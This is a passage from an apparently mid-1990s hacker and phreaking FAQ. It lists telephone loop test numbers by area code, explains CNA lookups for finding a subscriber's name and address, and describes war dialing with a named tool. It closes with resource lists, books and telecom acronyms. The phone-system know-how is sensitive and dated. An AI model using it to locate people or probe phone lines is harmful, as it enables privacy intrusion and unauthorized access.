of your research.
|
|
|
|
NPA High Low
|
|
--- -------- --------
|
|
201 228-9929 228-9930
|
|
201 238-9929 238-9930
|
|
201 251-9929 251-9930
|
|
201 254-9929 254-9930
|
|
201 272-9929 272-9930
|
|
201 330-9929 330-9930
|
|
201 333-9929 333-9930
|
|
201 339-9929 339-9930
|
|
201 347-9929 347-9930
|
|
201 376-9929 376-9930
|
|
201 398-9929 398-9930
|
|
201 467-9929 467-9930
|
|
201 528-9929 528-9930
|
|
201 558-9929 558-9930
|
|
201 559-9929 559-9930
|
|
201 560-9929 560-9930
|
|
201 592-9929 592-9930
|
|
201 625-9929 625-9930
|
|
201 631-9929 631-9930
|
|
201 637-9929 637-9930
|
|
201 655-9929 655-9930
|
|
201 666-9929 666-9930
|
|
201 690-9929 690-9930
|
|
201 761-9929 761-9930
|
|
201 762-9929 762-9929
|
|
201 762-9929 762-9930
|
|
201 762-9929 762-9929
|
|
201 763-9929 763-9930
|
|
201 764-9929 764-9930
|
|
201 767-9929 767-9930
|
|
201 768-9929 768-9930
|
|
201 773-9929 773-9930
|
|
201 879-9929 879-9930
|
|
201 946-9929 946-9930
|
|
201 992-9929 992-9930
|
|
201 993-9929 993-9930
|
|
201 994-9929 994-9930
|
|
212 352-9900 352-9906
|
|
213 360-1118 360-1119
|
|
213 365-1118 365-1119
|
|
213 455-0002 455-xxxx
|
|
213 455-0002 455-XXXX
|
|
213 546-0002 546-XXXX
|
|
213 546-0002 546-xxxx
|
|
305 778-9952 778-9951
|
|
305 964-9951 964-9952
|
|
312 222-9973 222-9974
|
|
312 234-9973 234-9974
|
|
313 224-9996 224-9997
|
|
313 225-9996 225-9997
|
|
313 234-9996 234-9997
|
|
313 237-9996 237-9997
|
|
313 256-9996 256-9997
|
|
313 272-9996 272-9997
|
|
313 273-9996 273-9997
|
|
313 277-9996 277-9997
|
|
313 281-9996 281-9997
|
|
313 292-9996 292-9997
|
|
313 299-9996 299-9997
|
|
313 321-9996 321-9997
|
|
313 326-9996 326-9997
|
|
313 356-9996 356-9997
|
|
313 362-9996 362-9997
|
|
313 369-9996 369-9997
|
|
313 388-9996 388-9997
|
|
313 397-9996 397-9997
|
|
313 399-9996 399-9997
|
|
313 445-9996 445-9997
|
|
313 465-9996 465-9997
|
|
313 471-9996 471-9997
|
|
313 474-9996 474-9997
|
|
313 477-9996 477-9997
|
|
313 478-9996 478-9997
|
|
313 483-9996 483-9997
|
|
313 497-9996 497-9997
|
|
313 526-9996 526-9997
|
|
313 552-9996 552-9997
|
|
313 556-9996 556-9997
|
|
313 561-9996 561-9997
|
|
313 569-9996 569-9996
|
|
313 575-9996 575-9997
|
|
313 577-9996 577-9997
|
|
313 585-9996 585-9997
|
|
313 591-9996 591-9997
|
|
313 621-9996 621-9997
|
|
313 626-9996 626-9997
|
|
313 644-9996 644-9997
|
|
313 646-9996 646-9997
|
|
313 647-9996 647-9997
|
|
313 649-9996 649-9997
|
|
313 663-9996 663-9997
|
|
313 665-9996 665-9997
|
|
313 683-9996 683-9997
|
|
313 721-9996 721-9997
|
|
313 722-9996 722-9997
|
|
313 728-9996 728-9997
|
|
313 731-9996 731-9997
|
|
313 751-9996 751-9997
|
|
313 776-9996 776-9997
|
|
313 781-9996 781-9997
|
|
313 787-9996 787-9997
|
|
313 822-9996 822-9997
|
|
313 833-9996 833-9997
|
|
313 851-9996 851-9997
|
|
313 871-9996 871-9997
|
|
313 875-9996 875-9997
|
|
313 886-9996 886-9997
|
|
313 888-9996 888-9997
|
|
313 898-9996 898-9997
|
|
313 934-9996 934-9997
|
|
313 942-9996 942-9997
|
|
313 963-9996 963-9997
|
|
313 977-9996 977-9997
|
|
313 995-9996 995-9997
|
|
402 422-0001 422-0002
|
|
402 422-0005 422-0006
|
|
402 422-0007 422-0008
|
|
402 422-0003 422-0004
|
|
402 422-0005 422-0006
|
|
402 422-0007 422-0008
|
|
402 422-0009 ALL-PREF
|
|
402 422-0003 422-0004
|
|
402 422-0009 ALL-PREF
|
|
402 422-0001 422-0002
|
|
402 572-0003 572-0004
|
|
517 422-9996 422-9997
|
|
517 423-9996 423-9997
|
|
517 455-9996 455-9997
|
|
517 563-9996 563-9997
|
|
517 663-9996 663-9997
|
|
517 851-9996 851-9997
|
|
609 921-9929 921-9930
|
|
609 994-9929 994-9930
|
|
616 997-9996 997-9997
|
|
616 ALL-PREF ALL-PREF
|
|
713 224-1499 759-1799
|
|
713 324-1499 324-1799
|
|
713 339-1499 339-1799
|
|
713 342-1499 342-1799
|
|
713 351-1499 351-1799
|
|
713 354-1499 354-1799
|
|
713 356-1499 356-1799
|
|
713 442-1499 442-1799
|
|
713 447-1499 447-1799
|
|
713 455-1499 455-1799
|
|
713 458-1499 458-1799
|
|
713 462-1499 462-1799
|
|
713 466-1499 466-1799
|
|
713 468-1499 468-1799
|
|
713 469-1499 469-1799
|
|
713 471-1499 471-1799
|
|
713 481-1499 481-1799
|
|
713 482-1499 482-1799
|
|
713 484-1499 484-1799
|
|
713 487-1499 487-1799
|
|
713 489-1499 489-1799
|
|
713 492-1499 492-1799
|
|
713 493-1499 493-1799
|
|
713 524-1499 524-1799
|
|
713 526-1499 526-1799
|
|
713 555-1499 555-1799
|
|
713 661-1499 661-1799
|
|
713 664-1499 664-1799
|
|
713 665-1499 665-1799
|
|
713 666-1499 666-1799
|
|
713 667-1499 667-1799
|
|
713 682-1499 976-1799
|
|
713 771-1499 771-1799
|
|
713 780-1499 780-1799
|
|
713 781-1499 997-1799
|
|
713 960-1499 960-1799
|
|
713 977-1499 977-1799
|
|
713 988-1499 988-1799
|
|
714 535-1118 535-1119
|
|
714 538-1118 538-1119
|
|
714 858-1118 858-1119
|
|
714 879-1118 879-1119
|
|
805 528-0044 528-0045
|
|
805 544-0044 544-0045
|
|
805 773-0044 773-0045
|
|
813 385-9971
|
|
908 776-9930 776-9930
|
|
|
|
|
|
13. What is a CNA number?
|
|
|
|
CNA stands for Customer Name and Address. The CNA number is a phone
|
|
number for telephone company personnel to call and get the name and
|
|
address for a phone number. If a telephone lineman finds a phone line
|
|
he does not recognize, he can use the ANI number to find it's phone
|
|
number and then call the CNA operator to see who owns it and where
|
|
they live.
|
|
|
|
Normal CNA numbers are available only to telephone company personnel.
|
|
Private citizens may now legally get CNA information from private
|
|
companies. Two such companies are:
|
|
|
|
Unidirectory (900)933-3330
|
|
Telename (900)884-1212
|
|
|
|
Note that these are 900 numbers, and will cost you approximately one
|
|
dollar per minute.
|
|
|
|
|
|
14. What is the telephone company CNA number for my area?
|
|
|
|
614 614-464-0123
|
|
|
|
|
|
15. What is scanning?
|
|
|
|
Scanning is dialing a large number of telephone numbers in the hope
|
|
of finding interesting carriers (computers) or tones.
|
|
|
|
Scanning can be done by hand, although dialing several thousand
|
|
telephone numbers by hand is extremely boring and takes a long time.
|
|
|
|
Much better is to use a scanning program, sometimes called a war
|
|
dialer or a demon dialer. Currently, the best war dialer available
|
|
to PC-DOS users is ToneLoc .99b8.
|
|
|
|
A war dialer will dial a range of numbers and log what it finds at
|
|
each number. You can then only dial up the numbers that the war
|
|
dialer marked as carriers or tones.
|
|
|
|
|
|
16. Is scanning illegal?
|
|
|
|
Excerpt from: 2600, Spring 1990, Page 27:
|
|
|
|
-BQ-
|
|
In some places, scanning has been made illegal. It would be hard,
|
|
though, for someone to file a complaint against you for scanning since
|
|
the whole purpose is to call every number once and only once. It's
|
|
not likely to be thought of as harassment by anyone who gets a single
|
|
phone call from a scanning computer. Some central offices have been
|
|
known to react strangely when people start scanning. Sometimes you're
|
|
unable to get a dialtone for hours after you start scanning. But
|
|
there is no uniform policy. The best thing to do is to first find out
|
|
if you've got some crazy law saying you can't do it. If, as is
|
|
likely, there is no such law, the only way to find out what happens is
|
|
to give it a try.
|
|
-EQ-
|
|
|
|
It should be noted that a law making scanning illegal was recently
|
|
passed in Colorado Springs, CO. It is now illegal to place a call
|
|
in Colorado Springs without the intent to communicate.
|
|
|
|
|
|
|
|
Section C: Resources
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
|
|
01. What are some ftp sites of interest to hackers?
|
|
|
|
aql.gatech.edu
|
|
bellcore.com
|
|
cert.org
|
|
cipher.com
|
|
cyberspace.com
|
|
deimos.cs.uah.edu
|
|
ftp.csua.berkeley.edu /pub/cypherpunks
|
|
ftp.eff.org /pub/cud
|
|
ftp.etext.org
|
|
ftp.netcom.com /pub/bradleym
|
|
ftp.netcom.com /pub/zzyzx
|
|
ftp.netsys.com
|
|
ftp.win.tue.nl
|
|
ftp.winternet.com /users/craigb
|
|
garbo.uwasa.fi:pc/crypt
|
|
ghost.dsi.unimi.it:/pub/crypt
|
|
grind.isca.uiwa.edu
|
|
hack-this.pc.cc.cmu.edu
|
|
halcyon.com
|
|
info.cert.org
|
|
lcs.mit.edu /* Telecom archives */
|
|
ripem.msu.edu:pub/crypt
|
|
rtfm.mit.edu
|
|
spy.org
|
|
theta.iis.u-tokyo.ac.jp /pub1/security
|
|
vincent2.iastate.edu login: anonymous.mabell /* Closed for the Summer */
|
|
wimsey.bc.ca /pub/crypto
|
|
|
|
|
|
02. What are some newsgroups of interest to hackers?
|
|
|
|
alt.2600
|
|
alt.cellular-phone-tech
|
|
alt.dcom.telecom
|
|
alt.hackers
|
|
alt.locksmithing
|
|
alt.sect.telcom
|
|
alt.security.index
|
|
alt.security.keydist
|
|
alt.security.pgp
|
|
alt.security.ripem
|
|
alt.security
|
|
comp.dcom.cellular
|
|
comp.dcom.telcom.tech
|
|
comp.dcom.telecom Telecommunications digest. (Moderated)
|
|
comp.dcom.telecom.tech
|
|
comp.org.cpsr.announce
|
|
comp.org.cpsr.talk
|
|
comp.org.eff
|
|
comp.org.eff
|
|
comp.security.announce
|
|
comp.security.misc Security issues of computers and networks.
|
|
comp.security.unix
|
|
comp.virus Computer viruses & security. (Moderated)
|
|
misc.security Security in general, not just computers. (Moderated)
|
|
rec.pyrotechnics
|
|
sci.crypt Different methods of data en/decryption.
|
|
|
|
|
|
03. What are some telnet sites of interest to hackers?
|
|
|
|
phred.pc.cc.cmu.edu
|
|
|
|
|
|
04. What are some gopher sites of interest to hackers?
|
|
|
|
gopher.eff.org
|
|
wiretap.spies.com
|
|
|
|
|
|
05. What are some World wide Web (WWW) sites of interest to hackers?
|
|
|
|
http://crimelab.com//bugtraq/bugtraq/html
|
|
http://cs.purdue.edu/homes/spaf/coast.html
|
|
http://cs.purdue.edu/homes/spaf/pcert.html
|
|
http://first.org
|
|
http://l0pht.com
|
|
http://tamsun.tamu.edu/~clm3840/hacking.html/
|
|
http://www.iia.org/~gautier/me.html
|
|
http://www.net23.com
|
|
http: /www.paranoia.com /defcon
|
|
http://www.phantom.com/~king
|
|
http://www.spy.org /Security/Local/News
|
|
|
|
|
|
06. What are some IRC channels of interest to hackers?
|
|
|
|
#2600
|
|
#hack
|
|
#phreak
|
|
#linux
|
|
#root
|
|
#unix
|
|
#warez
|
|
|
|
|
|
07. What are some BBS's of interest to hackers?
|
|
|
|
Home BBS (303)343-4053
|
|
|
|
|
|
08. What books are available on this subject?
|
|
|
|
Applied Cryptography: Protocols, Algorithms, and Source Code in C
|
|
Author: Bruce Schneier
|
|
Publisher: John Wiley & Sons
|
|
Copyright Date: 1994
|
|
ISBN: 0-471-59756-2
|
|
|
|
Computer Security Basics
|
|
Author: Deborah Russell and G.T. Gengemi Sr.
|
|
Publisher: O'Reilly & Associates, Inc.
|
|
Copyright Date: 1991
|
|
ISBN: 0-937175-71-4
|
|
|
|
Practical Unix Security
|
|
Author: Simson Garfinkel and Gene Spafford
|
|
Publisher: O'Reilly & Associates, Inc.
|
|
Copyright Date: 1991
|
|
ISBN: 0-937175-72-2
|
|
|
|
Unix Security: A Practical Tutorial
|
|
Author: N. Derek Arnold
|
|
Publisher: McGraw Hill
|
|
Copyright Date: 1993
|
|
ISBN: 0-07-002560-6
|
|
|
|
Unix System Security: A Guide for Users and Systems Adiministrators
|
|
Author: David A. Curry
|
|
Publisher: Addison-Wesley
|
|
Copyright Date: 1992
|
|
ISBN: 0-201-56327-4
|
|
|
|
Unix System Security
|
|
Author: Patrick H. Wood and Stephen G. Kochan
|
|
Publisher: Hayden Books
|
|
Copyright Date: 1985
|
|
ISBN: 0-672-48494-3
|
|
|
|
Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
|
|
Threats to Your System
|
|
Author: John McAfee and Colin Haynes
|
|
Publisher: St. Martin's Press
|
|
Copyright Date: 1989
|
|
ISBN: 0-312-03064-9 and 0-312-02889-X
|
|
|
|
Hackers: Heroes of the Computer Revolution
|
|
Author: Steven Levy
|
|
Publisher: Doubleday
|
|
Copyright Date: 1984
|
|
ISBN: 0-440-13495-6
|
|
|
|
Network Security Secrets
|
|
Author: David J. Stang and Sylvia Moon
|
|
Publisher: IDG Books
|
|
Copyright Date: 1993
|
|
ISBN: 1-56884-021-7
|
|
|
|
The Hacker Crackdown: Law and Disorder on the Electronic Frontier
|
|
Author: Bruce Sterling
|
|
Publisher: Bantam Books
|
|
Copyright Date: 1982
|
|
ISBN: 0-553-56370-X
|
|
|
|
Secrets of a Super Hacker
|
|
Author: The Knightmare
|
|
Publisher: Loompanics
|
|
Copyright Date: 1994
|
|
ISBN: 1-55950-106-5
|
|
|
|
|
|
|
|
Section D: Miscellaneous
|
|
~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
01. What does XXX stand for?
|
|
|
|
TLA Three Letter Acronym
|
|
|
|
ACL Access Control List
|
|
PIN Personal Identification Number
|
|
TCB Trusted Computing Base
|
|
|
|
ALRU Automatic Line Record Update
|
|
AN Associated Number
|
|
ARSB Automated Repair Service Bureau
|
|
ATH Abbreviated Trouble History
|
|
BOC Bell Operating Company
|
|
BOR Basic Output Report
|
|
CA Cable
|
|
COE Central Office Equipment
|
|
CMC Construction Maintenance Center
|
|
CNID Calling Number IDentification
|
|
CO Central Office
|
|
COCOT Customer Owned Coin Operated Telephone
|
|
CRSAB Centralized Repair Service Answering Bureau
|
|
DDD Direct Distance Dialing
|
|
ECC Enter Cable Change
|
|
LD Long Distance
|
|
LMOS Loop Maintenance Operations System
|
|
MLT Mechanized Loop Testing
|
|
NPA Numbering Plan Area
|
|
POTS Plain Old Telephone Service
|
|
RBOC Regional Bell Operating Company
|
|
RSB Repair Service Bureau
|
|
SS Special Service
|
|
TAS Telephone Answering Service
|
|
TH Trouble History
|
|
TREAT Trouble Report Evaluation and Analysis Tool
|
|
|
|
NTA The Nocturnal Trading Alliance
|
|
PE Public Enemy
|
|
TDT The Dream Team
|
|
THG The Humble Guys
|
|
THP The Hill People
|
|
|
|
--
|
|
\* Will Spencer : The advancement and diffusion of knowledge *\
|
|
\* Unix geek : is the only guardian of true liberty. *\
|
|
\* PC guru : -- James Madison *\
|
|
\* Revolutionary : 4th U.S. President *\
|
|
|